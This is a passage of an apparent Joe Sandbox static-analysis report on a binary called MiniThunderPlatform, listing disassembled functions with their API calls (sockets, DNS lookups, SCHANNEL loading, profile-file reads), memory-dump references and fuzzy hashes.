                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 00437218
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 00437231
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1614044465.0000000000417000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1614008254.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000448000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000456000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614158449.000000000045A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614181616.000000000045C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: U?$char_traits@_V?$allocator@_W@2@@std@@W@std@@$??1?$basic_string@_$??0?$basic_string@_?empty@?$basic_string@_
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 556388284-0
                                                                                                                                              • Opcode ID: f4cdbace8a1d51462b779622de07072b570e9d9fe2ea04cc763192010b05086a
                                                                                                                                              • Instruction ID: 90e07f8f363755116db5fd5e98db4c06cc8620c1272c0e9dbfd2afe140b17a6d
                                                                                                                                              • Opcode Fuzzy Hash: f4cdbace8a1d51462b779622de07072b570e9d9fe2ea04cc763192010b05086a
                                                                                                                                              • Instruction Fuzzy Hash: B631E572C00558CBCB60FBA9DC867DCBB34EF04318F52429AE915A7281DB395E48CBC9
                                                                                                                                              Function 1005BE60 Relevance: 10.6, APIs: 7, Instructions: 104threadnetworkCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 1005BE90
                                                                                                                                              • gethostbyname.WS2_32(?), ref: 1005BEB5
                                                                                                                                              • inet_ntoa.WS2_32(?), ref: 1005BEEE
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(00000000), ref: 1005BEFB
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000000), ref: 1005BF18
                                                                                                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 1005BF5C
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 1005BF6C
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalD@2@@std@@D@std@@SectionU?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@CurrentEnterLeaveThreadgethostbynameinet_ntoa
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3748678878-0
                                                                                                                                              • Opcode ID: 01aca89eb93c1d56f55f2fed1cad45b4771fc487a2dbcc939f2cce162bcb3b4d
                                                                                                                                              • Instruction ID: c018dfbe5642ed019fcd8a56a67997f5e0554579543c7aa6950d9c5371f6ccc3
                                                                                                                                              • Opcode Fuzzy Hash: 01aca89eb93c1d56f55f2fed1cad45b4771fc487a2dbcc939f2cce162bcb3b4d
                                                                                                                                              • Instruction Fuzzy Hash: 5941BF31601A55DFC724CF68CC88BAAB7B9FF99700F10866DE80A97641CB74B949CF90
                                                                                                                                              Function 10045050 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 87COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • AtlComPtrAssign.ATL71(?,?), ref: 10045115
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Assign
                                                                                                                                              • String ID: .\AsynSSLSocket.cpp$_connect_op_ptr == NULL$_handshake_status != 2$_operation_ptr == NULL$thunder_assert
                                                                                                                                              • API String ID: 1972284567-1913342989
                                                                                                                                              • Opcode ID: c5dc4b8f5cb36119efed811cc435dd99d823808eb103d1171ad7c42a325003c7
                                                                                                                                              • Instruction ID: 6f8ce30aeda6579e37c79f23592a14f6ddda52b1fc3536c32d043373a9c6b802
                                                                                                                                              • Opcode Fuzzy Hash: c5dc4b8f5cb36119efed811cc435dd99d823808eb103d1171ad7c42a325003c7
                                                                                                                                              • Instruction Fuzzy Hash: DA310879200200AFD320DB64DC85EA7B3E9FF99715F108918F98A97642D731F9628BA1
                                                                                                                                              Function 10044E30 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 59libraryloaderCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • LoadLibraryA.KERNEL32(SCHANNEL.DLL,?,?,?,?,?,10243F10,000000FF), ref: 10044E56
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,InitSecurityInterfaceA), ref: 10044E72
                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,10243F10,000000FF), ref: 10044E7F
                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,10243F10,000000FF), ref: 10044EAC
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorLast$AddressLibraryLoadProc
                                                                                                                                              • String ID: InitSecurityInterfaceA$SCHANNEL.DLL
                                                                                                                                              • API String ID: 1866314245-621169374
                                                                                                                                              • Opcode ID: 94be72778da4852c525741fe751a60c6d5ba4ea022bd3cbac89d8be5df66b631
                                                                                                                                              • Instruction ID: 1a9de74bd742f6b9e8894d0a5a0be3781e167b50212388513115398b2fbfcdf7
                                                                                                                                              • Opcode Fuzzy Hash: 94be72778da4852c525741fe751a60c6d5ba4ea022bd3cbac89d8be5df66b631
                                                                                                                                              • Instruction Fuzzy Hash: FF11A372900655EFD710CF66CC48B9ABBF8FB59360F11866AEC19D3351DB315901DB50
                                                                                                                                              Function 10048B40 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51networkCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • socket.WS2_32(00000002,00000001,00000006), ref: 10048B62
                                                                                                                                              • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,?,00000000,10244469,000000FF,10049292,?), ref: 10048B6F
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(create socket object error,?,?,?,?,?,?,?,?,?,?,?,00000000,10244469,000000FF,10049292), ref: 10048B80
                                                                                                                                                • Part of subcall function 1021ADF0: ??0exception@@QAE@XZ.MSVCR71(?,00000000), ref: 1021AE10
                                                                                                                                                • Part of subcall function 1021ADF0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1021AE35
                                                                                                                                                • Part of subcall function 1021ADF0: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(, error code: ,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1021AE47
                                                                                                                                                • Part of subcall function 1021ADF0: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71 ref: 1021AE66
                                                                                                                                                • Part of subcall function 1021ADF0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1021AE75
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B9B68), ref: 10048BA7
                                                                                                                                              • setsockopt.WS2_32(00000000,0000FFFF,00001002,?,00000004), ref: 10048BC4
                                                                                                                                              Strings
                                                                                                                                              • create socket object error, xrefs: 10048B75
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@$??0exception@@??1?$basic_string@?append@?$basic_string@ErrorExceptionLastThrowV01@V01@@V12@V12@@Y?$basic_string@setsockoptsocket
                                                                                                                                              • String ID: create socket object error
                                                                                                                                              • API String ID: 3265056843-3662707707
                                                                                                                                              • Opcode ID: 64c67c1de37bc4f649be777e410cfb38b20a0258e792f57ac37c56c2360514f2
                                                                                                                                              • Instruction ID: 9193cee48a2ff28e96102a05a1ad230a19d79bab219785fee7aabf62bf5b4b07
                                                                                                                                              • Opcode Fuzzy Hash: 64c67c1de37bc4f649be777e410cfb38b20a0258e792f57ac37c56c2360514f2
                                                                                                                                              • Instruction Fuzzy Hash: 6B11E176144340AFC220DB24CC49F9B77A9FB89B20F408B28F5A6972C0DBB99544CB91
                                                                                                                                              Function 1001F765 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 1001F76A
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000000), ref: 1001F78E
                                                                                                                                                • Part of subcall function 10001000: RtlInitializeCriticalSection.NTDLL(?), ref: 1000100D
                                                                                                                                              • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(?), ref: 1001F7C3
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 1001F7CF
                                                                                                                                                • Part of subcall function 1001EDAF: __EH_prolog.LIBCMT ref: 1001EDB4
                                                                                                                                                • Part of subcall function 1001EDAF: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000010,?,7C3869BF,1001F7E0), ref: 1001EDF0
                                                                                                                                                • Part of subcall function 1001EDAF: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001EE00
                                                                                                                                                • Part of subcall function 1001EDAF: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001EE10
                                                                                                                                                • Part of subcall function 1001EDAF: GetPrivateProfileSectionNamesA.KERNEL32(?,00005000,?), ref: 1001EE35
                                                                                                                                                • Part of subcall function 1001EDAF: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?), ref: 1001EE50
                                                                                                                                                • Part of subcall function 1001EDAF: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP71(_once,00000000), ref: 1001EE67
                                                                                                                                                • Part of subcall function 1001EDAF: GetPrivateProfileSectionA.KERNEL32(?,?,00005000,?), ref: 1001EE97
                                                                                                                                                • Part of subcall function 1001EDAF: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(?), ref: 1001EEB7
                                                                                                                                                • Part of subcall function 1001EDAF: ?find_first_of@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIDI@Z.MSVCP71(0000003D,00000000), ref: 1001EEC7
                                                                                                                                                • Part of subcall function 1001EDAF: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@II@Z.MSVCP71(?,00000000,00000000), ref: 1001EEE3
                                                                                                                                                • Part of subcall function 1001EDAF: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@II@Z.MSVCP71(?,?,?), ref: 1001EF07
                                                                                                                                                • Part of subcall function 1001EDAF: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?), ref: 1001EF14
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001F7E7
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@$V12@$?assign@?$basic_string@Section$H_prologPrivateProfileV01@$??1?$basic_string@??4?$basic_string@?find@?$basic_string@?find_first_of@?$basic_string@CriticalInitializeNamesV12@@Y?$basic_string@
                                                                                                                                              • String ID: stat.dat
                                                                                                                                              • API String ID: 1067293293-3030217696
                                                                                                                                              • Opcode ID: 431b28f5ce446249dd1b98752dbc53c2dea3256c98b786d4205f404993e85e28
                                                                                                                                              • Instruction ID: c399a8dac5f41b57ab0968f77eb7f041bdfa7082691d5a55e2e1af4a0dec07bd
                                                                                                                                              • Opcode Fuzzy Hash: 431b28f5ce446249dd1b98752dbc53c2dea3256c98b786d4205f404993e85e28
                                                                                                                                              • Instruction Fuzzy Hash: 41116A30A10158CFDB05DFA8C8597ADFBB8FF58600F40859DE446A3241DBB06A44CB22
                                                                                                                                              Function 100582A0 Relevance: 9.2, APIs: 6, Instructions: 217COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 1005CF10: GetNetworkParams.IPHLPAPI(?,?), ref: 1005CF62
                                                                                                                                                • Part of subcall function 1005CF10: GetNetworkParams.IPHLPAPI ref: 1005CF86
                                                                                                                                                • Part of subcall function 1005CF10: inet_addr.WS2_32(00000004), ref: 1005CFA6
                                                                                                                                                • Part of subcall function 1005CF10: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(00000004), ref: 1005CFB6
                                                                                                                                                • Part of subcall function 1005CF10: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1005CFE4
                                                                                                                                                • Part of subcall function 1005CF10: ??_V@YAXPAX@Z.MSVCR71(?,?,?,10245BEC,000000FF,100582FE,?), ref: 1005D000
                                                                                                                                              • GetTickCount.KERNEL32 ref: 10058373
                                                                                                                                                • Part of subcall function 10057620: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(774D23A0,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 10057664
                                                                                                                                                • Part of subcall function 10057620: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 10057675
                                                                                                                                                • Part of subcall function 10057620: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100576E1
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,?), ref: 10058393
                                                                                                                                                • Part of subcall function 10053B90: inet_addr.WS2_32(?), ref: 10053BF8
                                                                                                                                                • Part of subcall function 10053B90: htons.WS2_32(00000035), ref: 10053C19
                                                                                                                                                • Part of subcall function 10053B90: sendto.WS2_32(?,?,00000200,00000000,00000002,00000010), ref: 10053C81
                                                                                                                                                • Part of subcall function 10053B90: WSAGetLastError.WS2_32 ref: 10053C8D
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?), ref: 10058482
                                                                                                                                                • Part of subcall function 100569C0: ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(?,?,?,?,?,00000000,10058AC9,?,?,?,?,?,00000000,00000000,?), ref: 100569DA
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71 ref: 100583F4
                                                                                                                                                • Part of subcall function 100579A0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,?,?,?,?,?,102450B0,000000FF), ref: 100579FE
                                                                                                                                                • Part of subcall function 10057920: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000,00000014,00000000,0000000C,?,102453B9,000000FF,10057A8F,?,00000014,?,00000014), ref: 10057943
                                                                                                                                                • Part of subcall function 10057C90: ??$?MDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(?,0000000C,?,00000014,?,?,00000014,10058241,?,?), ref: 10057CB7
                                                                                                                                                • Part of subcall function 10057860: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,00000000,102453B9,000000FF,100586C5), ref: 10057897
                                                                                                                                              • GetTickCount.KERNEL32 ref: 100584DA
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71 ref: 10058556
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??0?$basic_string@$??1?$basic_string@$V01@@$CountD@1@@std@@D@2@@0@0@NetworkParamsTickV?$basic_string@inet_addr$??$???$?8?assign@?$basic_string@ErrorLastV12@V12@@htonssendto
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 903993397-0
                                                                                                                                              • Opcode ID: aaf3d20b2e1a892fd4c52534e7beef7fa25579211d60fe64f916d5de68a37c44
                                                                                                                                              • Instruction ID: 30b39dd2f87bbbd61e11a50310015ccbe3e8747cbe64aafa3080b886eee5ab16
                                                                                                                                              • Opcode Fuzzy Hash: aaf3d20b2e1a892fd4c52534e7beef7fa25579211d60fe64f916d5de68a37c44
                                                                                                                                              • Instruction Fuzzy Hash: 5F914B744093828FD324DF69C585BAFFBE4EB98704F44492DF59A83241EB74A508DB63
                                                                                                                                              Function 10019020 Relevance: 9.1, APIs: 6, Instructions: 126stringCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 1001671E: memcmp.MSVCR71(?,?,00000010), ref: 10016728
                                                                                                                                                • Part of subcall function 10018110: __EH_prolog.LIBCMT ref: 10018115
                                                                                                                                                • Part of subcall function 10018110: RtlLeaveCriticalSection.NTDLL(?), ref: 10018172
                                                                                                                                              • GetTickCount.KERNEL32 ref: 100190DC
                                                                                                                                              • StringFromIID.COMBASE(?,?), ref: 10019105
                                                                                                                                              • lstrlenW.KERNEL32(?), ref: 1001911F
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(00000000), ref: 10019145
                                                                                                                                              • CoTaskMemFree.COMBASE(?), ref: 1001914E
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10019157
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@CountCriticalFreeFromH_prologLeaveSectionStringTaskTicklstrlenmemcmp
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3768262621-0
                                                                                                                                              • Opcode ID: ba4324cd7109361c0fd43b44426d8ce39b9e60c4d5e2057550d0c6d0102395b4
                                                                                                                                              • Instruction ID: 21cd71a2a8381639a396e1e3201f4c39e062a1ce452af4f37869b7e71d856d49
                                                                                                                                              • Opcode Fuzzy Hash: ba4324cd7109361c0fd43b44426d8ce39b9e60c4d5e2057550d0c6d0102395b4
                                                                                                                                              • Instruction Fuzzy Hash: D141BE36604215AFDB14DBA4CC899DFB7FCFF5D650B21041AF906AB152EB30EE818B60
                                                                                                                                              Function 1005CF10 Relevance: 9.1, APIs: 6, Instructions: 82networkCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetNetworkParams.IPHLPAPI(?,?), ref: 1005CF62
                                                                                                                                              • GetNetworkParams.IPHLPAPI ref: 1005CF86
                                                                                                                                              • inet_addr.WS2_32(00000004), ref: 1005CFA6
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(00000004), ref: 1005CFB6
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1005CFE4
                                                                                                                                              • ??_V@YAXPAX@Z.MSVCR71(?,?,?,10245BEC,000000FF,100582FE,?), ref: 1005D000
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@NetworkParamsU?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@inet_addr
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1056547183-0
                                                                                                                                              • Opcode ID: 793034d2439a38517f34be07ad56ecbea802f2663f720833ea986e914fe0de4e
                                                                                                                                              • Instruction ID: 4072c848a36cb702e8b8046ccae22e1be0bcb480338e409e57a3601d0bf574b1
                                                                                                                                              • Opcode Fuzzy Hash: 793034d2439a38517f34be07ad56ecbea802f2663f720833ea986e914fe0de4e
                                                                                                                                              • Instruction Fuzzy Hash: 2231A2751087859FC320DF68D884B9BB7E8FF99354F404A1CF89E83291E734A549CB52
                                                                                                                                              Function 1002C6B7 Relevance: 9.1, APIs: 6, Instructions: 79COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 1002C6BC
                                                                                                                                                • Part of subcall function 1002C68F: GetFileAttributesA.KERNEL32(?,1002C6D8,?), ref: 1002C6A2
                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000,7C3869BF,00000000), ref: 1002C6FF
